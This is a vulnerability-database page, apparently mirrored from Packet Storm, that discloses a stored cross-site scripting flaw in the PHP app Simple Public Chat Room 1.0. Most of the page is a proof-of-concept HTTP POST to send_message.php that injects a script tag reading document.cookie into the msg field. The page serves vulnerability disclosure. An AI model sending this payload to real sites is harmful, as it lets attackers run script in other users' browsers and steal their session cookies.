Lucene search
K

Simple Public Chat Room 1.0 Cross Site Scripting

🗓️ 26 Jan 2021 00:00:00Reported by Richard JonesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 273 Views

Simple Public Chat Room 1.0 Cross Site Scripting vulnerability in send message functionalit

Code
`# Exploit Title: Simple Public Chat Room | Authenticated Stored Cross-Site Scripting  
# Exploit Author: Richard Jones  
# Date: 2021-01-26  
# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
#Replicates across chat sessions..  
  
  
POST /chat/send_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 58  
Origin: http://localhost  
Connection: close  
Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl  
  
msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation